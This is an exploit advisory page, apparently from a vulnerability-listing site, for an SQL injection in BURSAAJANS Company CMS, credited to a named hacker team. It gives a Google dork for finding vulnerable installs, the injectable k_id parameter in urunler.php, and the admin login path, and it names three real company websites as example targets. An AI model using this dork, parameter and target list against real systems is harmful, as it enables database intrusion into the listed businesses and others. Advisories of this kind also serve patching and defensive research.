BURSAAJANS Company Cms SQL Injection

2016-03-13 / 2016-03-14
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

|[+] Exploit Title: BURSAAJANS Company Cms SQL Injection |[+] |[+] Exploit Author: M4ni4c |[+] |[+] Team Name: Azerbaijan Cyber Army |[+] |[+] Official Website: http://az-cyber.org/ |[+] |[+] Vendor Homepage: http://www.bursaajans.com/ |[+] |[+] Google Dork: intext:Designed by BURSAAJANS |[+] |[+] Date: 13.03.2016 |[+] |--------------------------------------------------------------| |[+] Exploit: urunler.php?dil=tr&a=%C3%9CR%C3%9CNLER&k_id=X |[+] |[+] Admin panel: /yonetim/login.php |[+] |[+] Examples: |[+] |[+] http://www.acartextile.com.tr/urunler.php?dil=tr&a=%C3%9CR%C3%9CNLER&k_id=11 |[+] |[+] http://www.dastechairspring.com/urunler.php?dil=tr&a=%C3%9Cr%C3%BCnler&id=7&kid=1 |[+] |[+] http://www.umitcelik.com/urunler.php?dil=tr&b=&ab=Orta+Reyonlar&id=5&aid=11 |[+]Thanks: KroNiqs, Niko, Riko, Dado, Sprited


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top